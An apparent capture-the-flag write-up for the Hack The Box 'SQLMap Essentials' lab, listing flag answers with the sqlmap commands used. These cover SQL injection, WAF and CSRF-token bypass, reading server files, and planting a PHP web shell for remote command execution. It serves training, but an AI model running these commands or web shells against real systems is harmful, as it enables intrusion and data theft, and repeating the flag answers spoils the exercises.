SQLMap Essentials:

Link to challenge: https://academy.hackthebox.com/module/58

(log in required)
Class: Tier II | Easy | Offensive

Getting Started
SQLMap Overview:
Question: What's the fastest SQLi type?
Answer: UNION query-based
Method: ‘Error-based SQLi is considered as faster than all other types, except UNION
query-based, because it can retrieve a limited amount (e.g., 200 bytes) of data called
"chunks" through each request.’

Building Attacks
Running SQLMap on an HTTP Request:
Question: What's the contents of table flag2? (Case #2)
Answer: HTB{700_much_c0n6r475_0n_p057_r3qu357}
Method: first lets go to the browser to the website itself:
http://<target-IP>:<target-port>/
We select ‘Case #2’:

We are instructed to investigate POST parameter ‘id’.

For that we will run sqlmap using the command:
sqlmap -u "http://<target-IP>:<target-port>/case2.php" --
data='id=1' --method POST --batch --dump

now, there will be A LOT of putput, only the relevant parts will be screenshot-
ed:
*
*

We mark ‘Y’ here..

*
*

Parameter ‘id’ is injectable to various methods like this..

*
*

Parameter ‘id’ is vulnerable.. we can stop testing.. and get to the results…
*
*
Found the flag in database ‘testdb’, table ‘flag2’. It is also saved to csv.

Question: What's the contents of table flag3? (Case #3)

Answer: HTB{c00k13_m0n573r_15_7h1nk1n6_0f_6r475}
Method: lets select ‘Case #3’ in the main dashboard:

When selecting ‘click here’ – we get to ‘id=1’ value:

Anyway they tell us to investigate the url, with the cookie ‘id=1’, so lets do:
sqlmap -u "http://<target-IP>:<target-port>/case3.php" --
cookie="id=1" --dbs --dump --batch --level=5 --risk=3
we will get familiar output format to the case #2, which will not be repeated
here.. however at the end of which….:

Here are explanation on the flags:

Question: What's the contents of table flag4? (Case #4)
Answer: HTB{j450n_v00rh335_53nd5_6r475}
Method: lets enter the page of ‘case4’ (the method for that already covered):

In here we are dealing with json data: ‘{"id": 1}’. We will run the command:
sqlmap -u "http://<target-ip>:<target-port>/case4.php" --
data='{"id": 1}' --dbs --dump --batch --level=5 --risk=3 --
header="Content-Type: application/json"
and same as previous injections:
Attack Tuning:
Question: What's the contents of table flag5? (Case #5)
Answer: HTB{700_much_r15k_bu7_w0r7h_17}
Method:

sqlmap -u "http://<target-ip>:<target-port>/case5.php?id=1"
--dbs --dump --batch --level=5 --risk=3 -T flag5 --no-cast

*
*
Question: What's the contents of table flag6? (Case #6)
Answer: HTB{v1nc3_mcm4h0n_15_4570n15h3d}
Method:

sqlmap -u "http://<target-IP>:<target-
port>/case6.php?col=id" --dbs --dump --batch --level=5 --
risk=3 -T flag6 --no-cast
*
*

Question: What's the contents of table flag7? (Case #7)

Answer: HTB{un173_7h3_un173d}
Method:

sqlmap -u "http://<target-IP>:<target-port>/case7.php?id=1"
--union-cols=5 -D testdb -T flag7 –no-cast --dump --batch --
level=5 --risk=3
*
*
*
Database Enumeration
Database Enumeration:
Question: What's the contents of table flag1 in the testdb database? (Case #1)
Answer: HTB{c0n6r475_y0u_kn0w_h0w_70_run_b451c_5qlm4p_5c4n}
Method:

sqlmap -u "http://<target-IP>:<target-port>/case1.php?id=1"
-D testdb -T flag1 --no-cast --dump --batch --level=5 --
risk=3

*
*
*
*
Advanced Database Enumeration:
Question: What's the name of the column containing "style" in it's name?
(Case #1)
Answer: PARAMETER_STYLE
Method: we run the command:
sqlmap -u "http://<target-IP>:<target-port>/case1.php?id=1"
--search -C style --batch --level=5 --risk=3 --no-cast

*
*

Question: What's the Kimberly user's password? (Case #1)

Answer: Enizoom1609
Method: we will assume from prior experience and section’s guide that the
Kimberly columns is ‘name’, and the password column is ‘password’.
We will also assume that the database is named ‘testdb’, and table is named
‘users’
Lets find the columns list for good order:
sqlmap -u "http://<target-IP>:<target-port>/case1.php?id=1"
-D testdb -T users --columns --batch --level=5 --risk=3 --
no-cast

*
*

Now that we are confident that the columns are ‘name’ and ‘password’, lets
extract Kimberly’s password:
sqlmap -u "http://<target-IP>:<target-port>/case1.php?id=1"
-D testdb -T users --dump -C name,password --batch --level=5
--risk=3 --no-cast --where "name LIKE '%Kimberly%'"
*
*
Advanced SQLMap Usage
Bypassing Web Application Protections:
Question: What's the contents of table flag8? (Case #8)
Answer: HTB{y0u_h4v3_b33n_c5rf_70k3n1z3d}
Method: first, we will need to obtain the token. Lets start burpsuite
burpsuite
go to proxy, open browser and enter to the case8 URL:

Now, we turn the interceptor on, and enter ‘submit’:

The burpsuite intercepted the request, and in line 16 we can observe our CSRF
(cross site request forgery) token value, it is called ‘t0ken’.
Now we can insert that to our sqlmap command:
sqlmap -u "http://<target-IP>:<target-port>/case8.php" --
data="id=1&t0ken=<token-value>" --csrf-token="t0ken" --batch
--level=5 --risk=3 --dbs --dump -T flag8 --no-cast
*in here <token-value> is ‘Q0UZYzaFpsjkRsRGscxv0j3BbhWPDuVLRnrH3tpRdtA’
but of course it may change for every request. *:

*
*
Question: What's the contents of table flag9? (Case #9)
Answer: HTB{700_much_r4nd0mn355_f0r_my_74573}
Method:

There is a ‘click here’ button, lets click it:

There are the parameters ‘id=1&uid=<uid-value>’.

We need to randomize the uid. We ill use the command:
sqlmap -u "http://<target-IP>:<target-
port>/case9.php?id=1&uid=12345" --randomize=uid --batch --
level=5 --risk=3 --dbs --dump -T flag9 --no-cast
*
*

Question: What's the contents of table flag10? (Case #10)

Answer: HTB{y37_4n07h3r_r4nd0m1z3}
Method:

This is a bit similar to case 2, so first lets try to run command to case2
command:
sqlmap -u "http://<target-IP>:<target-port>/case10.php" --
data='id=1' --method POST --batch --dump -T flag10 –no-cast
*
*
we will get this error:

*
*

At the end of the scan the results suggest to use ‘--random-agent’. And that is
what we are going to do:
sqlmap -u "http://<target-IP>:<target-port>/case10.php" --
data='id=1' --method POST --batch --dump -T flag10 –no-cast -
-random-agent

*
*
Question: What's the contents of table flag11? (Case #11)
Answer: HTB{5p3c14l_ch4r5_n0_m0r3}
Method:

We will use the tamperscript ‘between’:

sqlmap -u "http://<target-IP>:<target-port>/case11.php?id=1"
--tamper=between --batch --level=5 --risk=3 --dbs --dump -T
flag11 --no-cast

*
*
*
*
OS Exploitation:
Question: Try to use SQLMap to read the file "/var/www/html/flag.txt".
Answer: HTB{5up3r_u53r5_4r3_p0w3rful!}
Method: first we need to determine that we have DBA (Database
Administrator) privileges, which allows us to read files.
Now as the target website has ‘id=1’ parameter:

we will use the command:

sqlmap -u "http://<target-IP>:<target-port>/?id=1" --is-dba
--batch

*
*
Value ‘True’ means we do have DBA privileges, which is great! We may
proceed:
sqlmap -u "http://<target-IP>:<target-port>/?id=1" --file-
read "/var/www/html/flag.txt" --batch

*
*

The file’s content was saved in our machine in that file. Lets get it:
cat /home/<attacking-box-
user>/.local/share/sqlmap/output/<target-
IP>/files/_var_www_html_flag.txt
Question: Use SQLMap to get an interactive OS shell on the remote host and
try to find another flag within the host.
Answer: HTB{n3v3r_run_db_45_db4}
Method: first lets create php shell payload and write it to the target machine
via SQL:
echo '<?php system($_GET["cmd"]); ?>' > shell.php

sqlmap -u "http://<target-IP>:<target-port>/?id=1" --file-

write "shell.php" --file-dest "/var/www/html/shell.php"

*
*

We now should be able to give commands to the target machine, lets test it
with something basic:
curl http://<target-IP>:<target-port>/shell.php?cmd=ls
It works (and that flag is the already obtained flag, ignore that).

Now sqlmap provides us with build in way to obtain a shell to the target
machine, after shell.php is injected to it:
sqlmap -u "http://<target-IP>:<target-port>/?id=1" --os-
shell --batch

*
*

Lets find the flag:

find / -type f -name flag.txt | grep flag.txt
The second flag is in the base ‘/’ path, lets get it:
cat /flag.txt
Skills Assessment
Skills Assessment:
Question: What's the contents of table final_flag?
Answer: HTB{n07_50_h4rd_r16h7?!}
Method: **note – as this section took me several sessions to complete, target
IP and port will occasionally change on the various screenshots. **
First, I will describe some failed attempts: sqlmap bruteforce the GET requests
on the ordinary pages, or the POST of those pages.

We need to find a proper POST page which is vulnerable to the sql injection
map.
Brute forcing with tools like gobuster or fuff will not work properly (not for me
anyway). We will have to find that post request manually.
Most of the supposedly POST generated requests on this target website like
review submitting or item checkout are disabled.
So, We will use burpsuite for that task. Lets open burpsuite browser on proxy
mode, and enter the website (enter the <target-IP:<target-port> on the URL):

Lets go to Catalog → Shop:

Now its time to activate the proxy interceptor shot page - we will select some
item (in this write-up it is the first one)

And its POST request will be intercepted by the proxy.

Lets right-click the request, and save the item to a file ‘request.txt’:
→

Now, there was some trial and error with the command parameters, especially
the tamper to choose for the sql-injection, however this is the initial one:
sqlmap -r request.txt --tamper=between --dump --batch --no-
cast --level=5 --risk=3
the command will base its attack based on the request stored in the
‘request.txt’ file:

*
*
*
*

We can observe here that there is a dababase ‘production’, and in it the table
‘final_flag’.
As the current command will fetch the entire database, and that quite a lot and
due to the command functionality will take some time – we will halt the
current command, and run again more focused search, on the ‘final_flag’ table
in ‘production’ database:
sqlmap -r request.txt --tamper=between --dump --batch --no-
cast --level=5 --risk=3 -D production -T final_flag
*
*